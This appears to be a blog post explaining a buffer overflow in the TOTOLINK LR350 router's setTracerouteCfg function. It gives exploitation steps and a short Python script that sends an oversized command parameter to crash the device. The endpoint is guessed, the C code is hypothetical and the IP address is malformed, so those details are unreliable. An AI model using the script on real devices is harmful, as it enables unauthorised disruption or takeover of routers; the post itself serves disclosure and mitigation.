CVE CyberSecurity Database News

CVE-2022-44258 - Exploiting Buffer Overflow in TOTOLINK LR350 (Firmware V9.3.5u.6369_B20220309) via setTracerouteCfg

Poster -

In late 2022, researchers identified a buffer overflow vulnerability in TOTOLINK’s LR350 router, specifically in firmware version V9.3.5u.6369_B20220309. Labeled CVE-2022-44258, this security flaw resides post-authentication in the setTracerouteCfg function via the command parameter, enabling attackers to execute arbitrary code on the device. This post breaks down exactly how this vulnerability can be exploited, why it matters, and how users and defenders can mitigate the risk.

What’s the Vulnerability?

CVE-2022-44258 is a post-authentication buffer overflow affecting the TOTOLINK LR350 router. This means an attacker needs valid credentials or must have hijacked a session—then, by sending a specially crafted request, they can overflow a buffer and potentially run malicious code with high privileges.

Summary in plain English: If someone logs in to your router (or tricks it into thinking they have), they can send a certain command that’s too long and make the router do things it shouldn’t, possibly giving them full control.

Where’s the Problem?

The vulnerability exists in the setTracerouteCfg function of the router’s web interface. This function takes user input provided by the command parameter in an HTTP POST request. Unfortunately, the developer didn’t check the length of this command value properly.

If command is too long, it can overwrite areas in the router’s memory that shouldn’t be changed—a classic buffer overflow.

Though we don’t have the source code, a simplified version of vulnerable logic might look like

void setTracerouteCfg(char *command) {
    char buf[256];
    strcpy(buf, command); // No length checking!
    // ... use buf ...
}

With strcpy used here, if command exceeds 256 bytes, the data will spill out of buf and smash other parts of memory, such as function pointers or control data.

Craft Malicious Request

- Create an HTTP POST request to the router’s management interface endpoint (likely /cgi-bin/, exact path may vary).
   - Set the command parameter to something way longer than expected; for instance, 512 “A” characters.
3. Send the Request: When the server processes the request, it writes the long command into a small buffer, overwriting not just the buffer but also other crucial data.
4. Achieve Code Execution: With enough control, the attacker could overwrite the return address of the function and redirect execution flow to malicious code included in the payload.
5. Get Shell/Backdoor: If successful, the attacker could gain remote command execution with admin privileges.

Exploit Example (Python Requests)

import requests

target_url = "http://192.168..1/cgi-bin/traceroute";
cookies = {'SessionID': 'valid-session-id'} # Replace with authorized session

overflow_payload = "A" * 512  # Payload length to trigger overflow

data = {
    'command': overflow_payload,
}

r = requests.post(target_url, data=data, cookies=cookies)
print("HTTP status:", r.status_code)
print("HTTP response:", r.text)

This minimal script (for educational purposes only) would send an oversized command to the router, triggering the overflow. In a full exploit, the payload would be crafted to inject shellcode.

Potential Impact

- Remote Code Execution (RCE): An attacker can run code of their choice. This could enable creating a persistent backdoor, launching attacks on users, or joining the device to a botnet.
- Device Takeover: Administrative access to the router, configuration theft, denial of service, or reconfiguration.

Mitigation

- Update Firmware: If you own a TOTOLINK LR350, update immediately to the latest available firmware, or contact TOTOLINK for a patch.
- Network Segmentation: Don’t expose router admin interfaces to the internet. Restrict access to trusted devices only.

Original References

- MITRE CVE Record: CVE-2022-44258
- Seclists Full Disclosure - TOTOLINK LR350 Post Auth Buffer Overflow
- Firmware Details

Conclusion

Router vulnerabilities might sound abstract, but CVE-2022-44258 is a real-world example of how a simple programming mistake can let hackers control your network hardware. If you use a TOTOLINK LR350, check your firmware today, and always keep your network gear up to date!

Timeline

Published on: 11/23/2022 16:15:00 UTC
Last modified on: 11/26/2022 03:44:00 UTC